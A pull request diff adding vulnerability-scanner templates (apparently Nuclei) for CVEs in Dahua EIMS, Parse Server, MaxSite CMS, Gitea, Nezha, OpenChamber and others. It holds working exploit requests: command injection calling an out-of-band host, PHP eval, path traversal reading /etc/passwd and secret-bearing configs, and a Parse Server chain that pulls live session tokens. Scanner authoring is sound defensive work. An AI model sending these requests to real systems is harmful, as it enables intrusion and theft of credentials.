### PR TITLE
upstream sync (semantic): changes requiring review

### DIFF
--- a/http/cves/2023/CVE-2023-27847.yaml
+++ b/http/cves/2023/CVE-2023-27847.yaml
@@ -48,6 +48,7 @@ http:
         dsl:
           - duration >= 5
           - status_code != 404
+        internal: true
         name: time-based
         type: dsl
     raw:
@@ -71,7 +72,7 @@ http:
     matchers:
       - dsl:
           - '!contains(body, "kr_blog_post_area")'
-        internal: false
+        internal: true
         name: blind-based
         type: dsl
     raw:

--- a/http/cves/2023/CVE-2023-3578.yaml
+++ b/http/cves/2023/CVE-2023-3578.yaml
@@ -32,6 +32,7 @@ http:
   - host-redirects: true
     matchers:
       - case-insensitive: true
+        internal: true
         part: response
         type: word
         words:

--- a/http/cves/2023/CVE-2023-6750.yaml
+++ b/http/cves/2023/CVE-2023-6750.yaml
@@ -61,7 +61,8 @@ http:
     path:
       - '{{BaseURL}}/wp-content/uploads/wp-clone/wpclone_backup/database.sql'
   - matchers:
-      - part: body
+      - internal: true
+        part: body
         regex:
           - ^[a-zA-Z0-9_]+$
         type: regex

--- a/http/cves/2024/CVE-2024-13985.yaml
+++ b/http/cves/2024/CVE-2024-13985.yaml
@@ -1,0 +1,41 @@
+id: CVE-2024-13985
+info:
+  name: Dahua EIMS - Unauthenticated Remote Code Execution via capture_handle
+  author: DhiyaneshDk
+  severity: critical
+  description: |
+    A command injection vulnerability in Dahua EIMS versions prior to 2240008 allows unauthenticated remote attackers to execute arbitrary system commands via the capture_handle.action interface. The flaw stems from improper input validation in the captureCommand parameter, which is processed without sanitization or authentication. By sending crafted HTTP requests, attackers can inject OS-level commands that are executed on the server, leading to full system compromise. Exploitation evidence was first observed by the Shadowserver Foundation on 2024-04-06 UTC.
+  impact: |
+    Complete unauthenticated server compromise. An attacker can read/write arbitrary files, install backdoors, pivot to the internal network, or disrupt emergency information services.
+  remediation: |
+    Apply the latest security patches from Dahua Security for the EIMS platform. Restrict access to the EIMS management interface to trusted IP ranges only. Place a WAF rule to block requests containing captureCommand to capture_handle.action.
+  reference:
+    - https://github.com/ahisec/nuclei-tps/blob/main/http/vulnerabilities/dahua/dahua-eims-capture-handle-rce.yaml
+    - https://cn-sec.com/archives/2554372.html
+    - https://github.com/wy876/POC/blob/main/%E5%A4%A7%E5%8D%8EEIMS-capture_handle%E6%8E%A5%E5%8F%A3%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2024-13985
+    cwe-id: CWE-78
+  metadata:
+    runzero-match: service["product"] matches "(?i)大华.EIMS"
+    max-request: 2
+    shodan-query: '"Dahua EIMS"'
+    verified: true
+    zoomeye-query: 'app="大华 EIMS"'
+  tags: cve,cve2024,dahua,eims,kev,oast,pre-auth,rce,vkev
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/config/asst/system_setPassWordValidate.action/capture_handle.action?captureFlag=true&captureCommand=ping%20{{interactsh-url}}%20index.pcap"
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
+      - type: regex
+        regex:
+          - "^success$"
+        # digest: 4a0a00473045022100e4fc4085177f95810ed502b32afd35cc1a50b5fb72595adcb1276419f149df5a02201eb6d737a8cf5571e49beb8db2dcbd52f5206b4c9fc87fd699cfa3cbe656d66d:922c64590222798bb761d5b6d8e72950

--- a/http/cves/2024/CVE-2024-13985.yaml
+++ b/http/cves/2024/CVE-2024-13985.yaml
@@ -19,7 +19,7 @@ info:
     cve-id: CVE-2024-13985
     cwe-id: CWE-78
   metadata:
-    runzero-match: service["product"] matches "(?i)大华.EIMS"
+    runzero-match: any(each(service["html.titles"]), {# matches "eims"})
     max-request: 2
     shodan-query: '"Dahua EIMS"'
     verified: true

--- a/http/cves/2026/CVE-2026-30965.yaml
+++ b/http/cves/2026/CVE-2026-30965.yaml
@@ -1,0 +1,140 @@
+id: CVE-2026-30965
+info:
+  name: Parse Server < 8.6.21 / 9.x < 9.5.2 - Session Token Exfiltration
+  author: str4k3r,0x_Akoko
+  severity: critical
+  description: |
+    Parse Server < 8.6.21 / 9.x < 9.5.2 contains an information disclosure vulnerability caused by improper handling of the redirectClassNameForKey query parameter, letting authenticated or unauthenticated attackers exfiltrate session tokens, exploit requires ability to create or update an object with a new relation field depending on Class-Level Permissions.
+  impact: |
+    Attackers can exfiltrate session tokens and take over user accounts, leading to account compromise.
+  remediation: |
+    Update to version 9.5.2-alpha.8 or 8.6.21 or later.
+  reference:
+    - https://github.com/parse-community/parse-server/security/advisories/GHSA-6r2j-cxgf-495f
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-30965
+    - https://github.com/parse-community/parse-server/commit/70b7b070e1135949dd80ecf382f34db0bfdbb71e
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
+    cvss-score: 9.9
+    cve-id: CVE-2026-30965
+    cwe-id: CWE-863
+  metadata:
+    runzero-match: any(each(service["http.bodies"]), {# matches "parseServerVersion"})
+    fofa-query: 'body="parseServerVersion" || header="X-Parse-Application-Id"'
+    max-request: 5
+    product: parse-server
+    shodan-query: '"X-Parse-Application-Id" OR http.html:"parseServerVersion"'
+    vendor: parse-community
+    verified: true
+  tags: auth-bypass,cve,cve2026,parse,parse-server,session-hijack
+variables:
+  cn: "{{to_lower(rand_text_alpha(8))}}"
+flow: (http(1) || http(2)) && http(3) && http(4) && http(5)
+http:
+  - raw:
+      - |
+        GET {{BaseURL}}/ HTTP/1.1
+        Host: {{Hostname}}
+    extractors:
+      - type: regex
+        name: appid
+        internal: true
+        group: 1
+        regex:
+          - '(?:applicationId|appId|APP_ID|PARSE_APP_ID)\s*[=:,]\s*"([A-Za-z0-9]{20,})"'
+          - 'Parse\.initialize\("([A-Za-z0-9]{20,})"'
+          - 'X-Parse-Application-Id["\s:]+([A-Za-z0-9]{20,})'
+      - type: regex
+        name: jskey
+        internal: true
+        group: 1
+        regex:
+          - '(?:javascriptKey|javaScriptKey|jsKey|JS_KEY|PARSE_JS_KEY)\s*[=:,]\s*"([A-Za-z0-9]{20,})"'
+          - 'Parse\.initialize\("[A-Za-z0-9]+"\s*,\s*"([A-Za-z0-9]{20,})"'
+    matchers:
+      - type: dsl
+        dsl:
+          - 'len(appid) > 0'
+          - 'len(jskey) > 0'
+        condition: and
+        internal: true
+  - raw:
+      - |
+        GET {{BaseURL}}/index.js HTTP/1.1
+        Host: {{Hostname}}
+    extractors:
+      - type: regex
+        name: appid
+        internal: true
+        group: 1
+        regex:
+          - '(?:applicationId|appId|APP_ID|PARSE_APP_ID)\s*[=:,]\s*"([A-Za-z0-9]{20,})"'
+          - 'Parse\.initialize\("([A-Za-z0-9]{20,})"'
+          - 'X-Parse-Application-Id["\s:]+([A-Za-z0-9]{20,})'
+      - type: regex
+        name: jskey
+        group: 1
+        regex:
+          - '(?:javascriptKey|javaScriptKey|jsKey|JS_KEY|PARSE_JS_KEY)\s*[=:,]\s*"([A-Za-z0-9]{20,})"'
+          - 'Parse\.initialize\("[A-Za-z0-9]+"\s*,\s*"([A-Za-z0-9]{20,})"'
+        internal: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'len(appid) > 0'
+          - 'len(jskey) > 0'
+        condition: and
+        internal: true
+  - raw:
+      - |
+        GET {{BaseURL}}/parse/health HTTP/1.1
+        Host: {{Hostname}}
+        X-Parse-Application-Id: {{appid}}
+        X-Parse-Javascript-Key: {{jskey}}
+    matchers:
+      - type: dsl
+        internal: true
+        condition: and
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "ok")'
+  - raw:
+      - |
+        POST {{BaseURL}}/parse/classes/{{cn}} HTTP/1.1
+        Host: {{Hostname}}
+        X-Parse-Application-Id: {{appid}}
+        X-Parse-Javascript-Key: {{jskey}}
+        Content-Type: application/json
+
+        {"pivot":{"__op":"AddRelation","objects":[{"__type":"Pointer","className":"_Session","objectId":"{{cn}}"}]}}
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 201'
+          - 'contains(body, "objectId")'
+        condition: and
+        internal: true
+  - raw:
+      - |
+        GET {{BaseURL}}/parse/classes/{{cn}}?redirectClassNameForKey=pivot&limit=3 HTTP/1.1
+        Host: {{Hostname}}
+        X-Parse-Application-Id: {{appid}}
+        X-Parse-Javascript-Key: {{jskey}}
+    extractors:
+      - type: regex
+        name: session_tokens
+        group: 1
+        regex:
+          - '"sessionToken"\s*:\s*"(r:[a-f0-9]+)"'
+      - type: regex
+        name: user_ids
+        group: 1
+        regex:
+          - '"user":{"__type":"Pointer","className":"_User","objectId":"([A-Za-z0-9]+)"'
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains_all(body, "sessionToken", "results")'
+        condition: and
+        # digest: 4b0a00483046022100bd625cac8d90d7b696ef9119b75848e33932c24800759d5f807c3d88a9d71e690221009e7874f51896cac3a68ce42421d42006f655feed998c69a43c5a4c4536924733:922c64590222798bb761d5b6d8e72950

--- a/http/cves/2026/CVE-2026-30965.yaml
+++ b/http/cves/2026/CVE-2026-30965.yaml
@@ -19,7 +19,7 @@ info:
     cve-id: CVE-2026-30965
     cwe-id: CWE-863
   metadata:
-    runzero-match: any(each(service["http.bodies"]), {# matches "parseServerVersion"})
+    runzero-match: service["http.head.accessControlExposeHeaders"] contains "X-Parse-Application-Id"
     fofa-query: 'body="parseServerVersion" || header="X-Parse-Application-Id"'
     max-request: 5
     product: parse-server

--- a/http/cves/2026/CVE-2026-3395.yaml
+++ b/http/cves/2026/CVE-2026-3395.yaml
@@ -1,0 +1,60 @@
+id: CVE-2026-3395
+info:
+  name: MaxSite CMS <=109.1 - Remote Code Execution
+  author: ritikchaddha
+  severity: high
+  description: |
+    MaxSite CMS through 109.1 allows unauthenticated remote attackers to execute arbitrary code via the MarkItUp editor preview AJAX endpoint, preview-ajax.php. The endpoint insufficiently authenticates the request, failing to ensure the user is logged in, and processes the attacker's input via unsafe usage of PHP eval() on user-supplied [php]...[/php] shortcodes. By providing a POST request to the vulnerable /ajax/ endpoint with crafted input, attackers may achieve remote code execution. The issue is addressed in version 109.2 by implementing proper authentication controls.
+  reference:
+    - https://github.com/mbanyamer/CVE-2026-3395-MaxSite-CMS-Unauthenticated-RCE
+    - https://github.com/rootdirective-sec/CVE-2026-3395-Lab
+    - https://github.com/maxsite/cms/commit/08937a3c5d672a242d68f53e9fccf8a748820ef3
+    - https://vuldb.com/?id.348281
+    - https://www.cyber.gov.au/about-us/view-all-content/alerts-and-advisories/large-scale-exploitation-campaign-targeting-website-content-management-systems-cms
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-3395
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
+    cvss-score: 7.3
+    cve-id: CVE-2026-3395
+    cwe-id: CWE-94
+  metadata:
+    runzero-match: any(each(service["http.bodies"]), {# contains "MaxSite CMS"})
+    fofa-query: "MaxSite CMS"
+    max-request: 2
+    product: maxsite_cms
+    publicwww-query: "MaxSite CMS"
+    shodan-query: "MaxSite CMS"
+    vendor: max-3000
+    verified: true
+  tags: cms,cve,cve2026,eval,kev,maxsite,rce
+flow: http(1) && http(2)
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "MaxSite CMS"
+          - "maxsite_cms"
+          - "max-3000.com"
+          - "/maxsite/"
+        case-insensitive: true
+        internal: true
+  - raw: |
+      POST /ajax/YWRtaW4vcGx1Z2lucy9lZGl0b3JfbWFya2l0dXAvcHJldmlldy1hamF4LnBocA== HTTP/1.1
+      Host: {{Hostname}}
+      Content-Type: application/x-www-form-urlencoded
+      X-Requested-With: XMLHttpRequest
+
+      data=%5Bphp%5Decho+md5%28%27cve-2026-3395-nuclei%27%29%3B%5B%2Fphp%5D
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "a92788d6874137d1c4c4eaf6b6c0806a"
+      - type: status
+        status:
+          - 200

--- a/http/cves/2026/CVE-2026-3395.yaml
+++ b/http/cves/2026/CVE-2026-3395.yaml
@@ -18,7 +18,7 @@ info:
     cve-id: CVE-2026-3395
     cwe-id: CWE-94
   metadata:
-    runzero-match: any(each(service["http.bodies"]), {# contains "MaxSite CMS"})
+    runzero-match: any(each(service["http.bodies"]), {# matches `meta name="generator" content="MaxSite CMS"`})
     fofa-query: "MaxSite CMS"
     max-request: 2
     product: maxsite_cms
@@ -42,13 +42,14 @@ http:
           - "/maxsite/"
         case-insensitive: true
         internal: true
-  - raw: |
-      POST /ajax/YWRtaW4vcGx1Z2lucy9lZGl0b3JfbWFya2l0dXAvcHJldmlldy1hamF4LnBocA== HTTP/1.1
-      Host: {{Hostname}}
-      Content-Type: application/x-www-form-urlencoded
-      X-Requested-With: XMLHttpRequest
+  - raw:
+      - | 
+        POST /ajax/YWRtaW4vcGx1Z2lucy9lZGl0b3JfbWFya2l0dXAvcHJldmlldy1hamF4LnBocA== HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        X-Requested-With: XMLHttpRequest
 
-      data=%5Bphp%5Decho+md5%28%27cve-2026-3395-nuclei%27%29%3B%5B%2Fphp%5D
+        data=%5Bphp%5Decho+md5%28%27cve-2026-3395-nuclei%27%29%3B%5B%2Fphp%5D
     matchers-condition: and
     matchers:
       - type: word

--- a/http/cves/2026/CVE-2026-34976.yaml
+++ b/http/cves/2026/CVE-2026-34976.yaml
@@ -18,7 +18,7 @@ info:
     cve-id: CVE-2026-34976
     cwe-id: CWE-862
   metadata:
-    runzero-match: any(each(service["html.titles"]), {# matches "Dgraph"})
+    runzero-match: any(each(service["html.titles"]), {# matches "^Dgraph Ratel Dashboard"})
     fofa-query: body="dgraph"
     max-request: 3
     product: dgraph

--- a/http/cves/2026/CVE-2026-34976.yaml
+++ b/http/cves/2026/CVE-2026-34976.yaml
@@ -1,0 +1,72 @@
+id: CVE-2026-34976
+info:
+  name: Dgraph <=v25.3.0 - Admin Mutation Missing Authorization
+  author: str4k3r
+  severity: critical
+  description: |
+    Dgraph <=v25.3.0 contains an authentication bypass caused by missing authorization middleware for the restoreTenant admin mutation, letting unauthenticated attackers overwrite the database, read files, and perform SSRF, exploit requires no authentication.
+  impact: |
+    Unauthenticated attackers can overwrite the database, read server files, and perform SSRF, leading to full data compromise and server access.
+  remediation: |
+    Update to version 25.3.1 or later.
+  reference:
+    - https://github.com/hypermodeinc/dgraph/security/advisories/GHSA-p5rh-vmhp-gvcw
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-34976
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cve-id: CVE-2026-34976
+    cwe-id: CWE-862
+  metadata:
+    runzero-match: any(each(service["html.titles"]), {# matches "Dgraph"})
+    fofa-query: body="dgraph"
+    max-request: 3
+    product: dgraph
+    shodan-query: title:"Dgraph"
+    vendor: hypermodeinc
+    verified: true
+  tags: auth-bypass,cve,cve2026,dgraph,ssrf
+flow: http(1) && http(2) && http(3)
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+    host-redirects: true
+    max-redirects: 3
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains_any(body, "dgraph", "Dgraph")'
+        condition: and
+        internal: true
+  - raw:
+      - |
+        POST /admin HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"query": "mutation { restore(input: { location: \"file:///nonexistent-cve-34976-probe/\" }) { code message } }"}
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "unauthorized ip address")'
+        condition: and
+        internal: true
+  - raw:
+      - |
+        POST /admin HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"query": "mutation { restoreTenant(input: { restoreInput: { location: \"file:///nonexistent-cve-34976-probe/\" }, fromNamespace: 0 }) { code message } }"}
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "restoreTenant")'
+          - '!contains(body, "unauthorized ip address")'
+        condition: and
+        # digest: 490a0046304402204f00a1cf05b1fcf27c0853ceb51f3bba5b256f696217b481eac3ad3d33c813fa0220756c63c2dc90a961d5d09fc38b034dae35cd7fd841d8e1807f5b90e07694e84d:922c64590222798bb761d5b6d8e72950

--- a/http/cves/2026/CVE-2026-50160.yaml
+++ b/http/cves/2026/CVE-2026-50160.yaml
@@ -1,0 +1,60 @@
+id: CVE-2026-50160
+info:
+  name: Hoppscotch <= 2026.4.1 - Mass Assignment JWT_SECRET Overwrite
+  author: str4k3r
+  severity: critical
+  description: |
+    Hoppscotch self-hosted backend <= 2026.4.1 contains a broken authentication caused by mass assignment via unauthenticated POST /v1/onboarding/config endpoint, letting unauthenticated attackers overwrite JWT_SECRET to forge tokens and fully compromise the server, exploit requires attacker to access fresh instance before onboarding completes or when no users exist.
+  impact: |
+    Unauthenticated attackers can forge JWT tokens and fully compromise the server, including administrator access.
+  remediation: |
+    Update to version 2026.5.0 or later.
+  reference:
+    - https://github.com/hoppscotch/hoppscotch/security/advisories/GHSA-j542-4rch-8hwf
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-50160
+    - https://github.com/hoppscotch/hoppscotch/pull/6171
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
+    cvss-score: 10.0
+    cve-id: CVE-2026-50160
+    cwe-id: CWE-915
+  metadata:
+    runzero-match: any(each(service["html.titles"]), {# matches "Hoppscotch"})
+    fofa-query: title="Hoppscotch"
+    max-request: 2
+    product: hoppscotch
+    shodan-query: http.title:"Hoppscotch"
+    vendor: hoppscotch
+    verified: true
+  tags: cve,cve2026,hoppscotch,jwt,mass-assignment
+flow: http(1) && http(2)
+http:
+  - raw:
+      - |
+        GET /v1/onboarding/status HTTP/1.1
+        Host: {{Hostname}}
+        Accept: application/json
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "canReRunOnboarding")'
+          - 'contains(body, "\"onboardingCompleted\":false") || contains(body, "\"canReRunOnboarding\":true")'
+        condition: and
+        internal: true
+  - raw:
+      - |
+        POST /v1/onboarding/config HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+        Accept: application/json
+
+        {"CVE_2026_50160_DETECT":"true"}
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 400'
+          - 'contains(body, "VITE_ALLOWED_AUTH_PROVIDERS")'
+          - '!contains(body, "should not exist")'
+        condition: and
+        # digest: 4a0a00473045022100e75338fdf15a4ab7d4d1ca3c5c5a0ebc82a6c779fc5890f14655f4c2ec3eb9d802205741646441941851b01efb31e7dd88e26c72f08409ebfaa9fba256e00af8619c:922c64590222798bb761d5b6d8e72950

--- a/http/cves/2026/CVE-2026-50160.yaml
+++ b/http/cves/2026/CVE-2026-50160.yaml
@@ -19,7 +19,7 @@ info:
     cve-id: CVE-2026-50160
     cwe-id: CWE-915
   metadata:
-    runzero-match: any(each(service["html.titles"]), {# matches "Hoppscotch"})
+    runzero-match: any(each(service["html.titles"]), {# matches "^Hoppscotch"})
     fofa-query: title="Hoppscotch"
     max-request: 2
     product: hoppscotch

--- a/http/cves/2026/CVE-2026-53519.yaml
+++ b/http/cves/2026/CVE-2026-53519.yaml
@@ -18,7 +18,7 @@ info:
     cve-id: CVE-2026-53519
     cwe-id: CWE-22
   metadata:
-    runzero-match: any(each(service["html.titles"]), {# matches "Nezha"})
+    runzero-match: any(each(service["html.titles"]), {# matches "Nezha Monitoring$"})
     shodan-query: title:"Nezha"
     verified: true
   tags: cve,cve2026,lfi,nezha,traversal,unauth

--- a/http/cves/2026/CVE-2026-53519.yaml
+++ b/http/cves/2026/CVE-2026-53519.yaml
@@ -1,0 +1,38 @@
+id: CVE-2026-53519
+info:
+  name: Nezha Dashboard < 2.0.13 - Path Traversal
+  author: str4k3r
+  severity: critical
+  description: |
+    Nezha Monitoring < 2.0.13 contains a path traversal caused by improper prefix checking in the dashboard's NoRoute handler, letting unauthenticated attackers read arbitrary files via crafted URLs.
+  impact: |
+    Unauthenticated attackers can read arbitrary files on the server, potentially exposing sensitive configuration or data files.
+  remediation: |
+    Update to version 2.0.13 or later.
+  reference:
+    - https://github.com/nezhahq/nezha/security/advisories/GHSA-5c25-7vpj-9mqh
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-53519
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
+    cvss-score: 9.1
+    cve-id: CVE-2026-53519
+    cwe-id: CWE-22
+  metadata:
+    runzero-match: any(each(service["html.titles"]), {# matches "Nezha"})
+    shodan-query: title:"Nezha"
+    verified: true
+  tags: cve,cve2026,lfi,nezha,traversal,unauth
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/dashboard%2e%2e/data/config.yaml"
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "jwt_secret_key:"
+      - type: status
+        status:
+          - 200
+        # digest: 4b0a00483046022100b818c7de9f2cc5ee192946684a59e9d1e57115f89b32e5fbbf15bc013329fa4b0221009620cf2278e8c919ca41689d17866b8f7edeb9f41f968dd4a0e8c06659f01cf2:922c64590222798bb761d5b6d8e72950

--- a/http/cves/2026/CVE-2026-53976.yaml
+++ b/http/cves/2026/CVE-2026-53976.yaml
@@ -20,7 +20,7 @@ info:
     cve-id: CVE-2026-53976
     cwe-id: CWE-22
   metadata:
-    runzero-match: any(each(service["html.titles"]), {# matches "OpenChamber"})
+    runzero-match: any(each(service["html.titles"]), {# matches "^OpenChamber -"})
     fofa-query: title="OpenChamber"
     max-request: 1
     product: openchamber

--- a/http/cves/2026/CVE-2026-53976.yaml
+++ b/http/cves/2026/CVE-2026-53976.yaml
@@ -1,0 +1,44 @@
+id: CVE-2026-53976
+info:
+  name: OpenChamber <1.13.0 - Unauthenticated Arbitrary File Read
+  author: str4k3r
+  severity: critical
+  description: |
+    OpenChamber 1.11.7 contains a path traversal vulnerability in the file-serving endpoints /api/fs/read, /api/fs/stat, and /api/fs/raw that allows unauthenticated remote attackers to read arbitrary files by supplying the allowOutsideWorkspace=true query parameter alongside an absolute path, bypassing the workspace boundary check in resolveReadPathFromContext. Attackers can exploit the vacuous isPathWithinRoot guard to read sensitive files such as the JWT signing secret, SSH private keys, API credentials, and environment variables, enabling full authentication bypass by forging session cookies on password-protected deployments.
+  impact: |
+    Unauthenticated attackers can read sensitive files and bypass authentication, leading to full system compromise.
+  remediation: |
+    Update to the latest version that fixes this vulnerability.
+  reference:
+    - https://www.vulncheck.com/advisories/openchamber-path-traversal-file-read-via-allowoutsideworkspace-parameter
+    - https://github.com/openchamber/openchamber/commit/f1b9506132faf6c564a2694c7f33b94421a49b4a
+    - https://github.com/openchamber/openchamber
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-53976
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
+    cvss-score: 9.1
+    cve-id: CVE-2026-53976
+    cwe-id: CWE-22
+  metadata:
+    runzero-match: any(each(service["html.titles"]), {# matches "OpenChamber"})
+    fofa-query: title="OpenChamber"
+    max-request: 1
+    product: openchamber
+    shodan-query: http.title:"OpenChamber"
+    vendor: openchamber
+    verified: true
+  tags: cve,cve2026,lfi,openchamber,oss,traversal,unauth
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/api/fs/read?allowOutsideWorkspace=true&path=/etc/passwd"
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+      - type: status
+        status:
+          - 200
+        # digest: 4b0a0048304602210095fd10f5f0de3f3e28867b374e45056f0fad7f58bc529e742b20aa61446a3375022100c13dfe2bcf9d0af2055720bdac98a591026c8ca077961bc9994d354ec6e52131:922c64590222798bb761d5b6d8e72950

--- a/http/cves/2026/CVE-2026-59774.yaml
+++ b/http/cves/2026/CVE-2026-59774.yaml
@@ -18,7 +18,7 @@ info:
     cve-id: CVE-2026-59774
     cwe-id: CWE-22
   metadata:
-    runzero-match: any(each(service["html.titles"]), {# matches "Gitea"})
+    runzero-match: service["product"] matches "^Gitea:Gitea"
     fofa-query: title="Gitea"
     max-request: 2
     product: gitea

--- a/http/cves/2026/CVE-2026-59774.yaml
+++ b/http/cves/2026/CVE-2026-59774.yaml
@@ -1,0 +1,67 @@
+id: CVE-2026-59774
+info:
+  name: Gitea 1.22.1-1.27.0 - Unauthenticated Arbitrary File Read
+  author: ashish-cybersec
+  severity: critical
+  description: |
+    Gitea versions 1.22.1 through 1.27.0 initialize the go-org markup renderer without replacing its default ReadFile callback. An unauthenticated attacker can submit Org-mode markup containing an #+INCLUDE directive with an absolute path to the repository markup endpoint of any public repository, causing the server to read and render arbitrary files accessible to the Gitea service user.
+  impact: |
+    Unauthenticated attackers can read arbitrary files readable by the Gitea service user, including app.ini which contains INTERNAL_TOKEN, OAuth and JWT material, and database credentials. The advisory notes this can be escalated to command execution via Git hook injection.
+  remediation: |
+    Update to Gitea version 1.27.1 or later.
+  reference:
+    - https://github.com/go-gitea/gitea/security/advisories/GHSA-6v53-hr58-556r
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-59774
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-59774
+    cwe-id: CWE-22
+  metadata:
+    runzero-match: any(each(service["html.titles"]), {# matches "Gitea"})
+    fofa-query: title="Gitea"
+    max-request: 2
+    product: gitea
+    shodan-query: http.title:"Gitea"
+    vendor: go-gitea
+    verified: true
+  tags: cve,cve2026,gitea,lfi,markup,traversal
+flow: http(1) && http(2)
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/api/v1/repos/search?limit=1"
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "\"full_name\":")'
+        condition: and
+        internal: true
+    extractors:
+      - type: json
+        name: reponame
+        json:
+          - '.data[0].full_name'
+        internal: true
+  - raw:
+      - |
+        POST /{{reponame}}/markup HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        mode=file&file_path=a.org&text=%23%2BINCLUDE%3A%20%22%2Fetc%2Fpasswd%22%20src%20shell
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "chroma language-bash"
+      - type: regex
+        part: body
+        regex:
+          - 'root:.*:0:0:'
+      - type: status
+        status:
+          - 200
+        # digest: 490a0046304402207952c0ad7804ce2b1f097b7793cceb70ee22f58c77c90e14ef7258f9246644b10220436b2bb491ced8525e677d0cc58f2cab8e2c6321c2c308461531f55b7e53c442:922c64590222798bb761d5b6d8e72950

--- a/http/cves/2026/CVE-2026-67208.yaml
+++ b/http/cves/2026/CVE-2026-67208.yaml
@@ -23,7 +23,7 @@ info:
     cve-id: CVE-2026-67208
     cwe-id: CWE-306
   metadata:
-    runzero-match: service["product"] matches "(?i)somta.juggle"
+    runzero-match: any(each(service["html.titles"]), {# matches "^Juggle$"})
     max-request: 2
     product: juggle
     vendor: somta

--- a/http/cves/2026/CVE-2026-67208.yaml
+++ b/http/cves/2026/CVE-2026-67208.yaml
@@ -1,0 +1,61 @@
+id: CVE-2026-67208
+info:
+  name: Juggle <= 1.6.0 - Unauthenticated Exposed H2 Database Console
+  author: str4k3r
+  severity: critical
+  description: |
+    Juggle ships the H2 database web console enabled and reachable from
+    non-localhost by default. No application-level authentication covers
+    the /h2-console path, and the shipped default datasource credentials
+    (sa/juggle) are known. An unauthenticated remote attacker can reach the
+    console and, using the default credentials, achieve OS command
+    execution on the host via the H2 CREATE ALIAS Runtime.exec() technique.
+  impact: |
+    Unauthenticated remote attackers can execute arbitrary OS commands with root privileges, leading to full system compromise.
+  remediation: |
+    Update to the latest version and change default credentials; restrict access to /h2-console.
+  reference:
+    - https://github.com/somta/Juggle/issues/86
+    - https://www.vulncheck.com/advisories/juggle-unauthenticated-rce-via-exposed-h2-console
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-67208
+    cwe-id: CWE-306
+  metadata:
+    runzero-match: service["product"] matches "(?i)somta.juggle"
+    max-request: 2
+    product: juggle
+    vendor: somta
+    verified: true
+  tags: cve,cve2026,exposure,h2,juggle,rce,unauth
+flow: |
+  http("juggle-detect") && http("h2-console-check")
+http:
+  - method: GET
+    id: juggle-detect
+    path:
+      - "{{BaseURL}}"
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "<title>Juggle</title>")'
+        condition: and
+        internal: true
+  - method: GET
+    id: h2-console-check
+    path:
+      - "{{BaseURL}}/h2-console/"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        part: body
+        words:
+          - "<title>H2 Console</title>"
+          - "login.jsp?jsessionid="
+        condition: and
+        # digest: 4a0a0047304502205e28026a92347dca3482dd051d9166c356963171ce61bc2f406827dc059fafb70221008f91ba001a6197f967d85baaa91236b187dedc7b1e7e4816ffdd48cadb3ef6f0:922c64590222798bb761d5b6d8e72950

--- a/http/default-logins/doccano-default-login.yaml
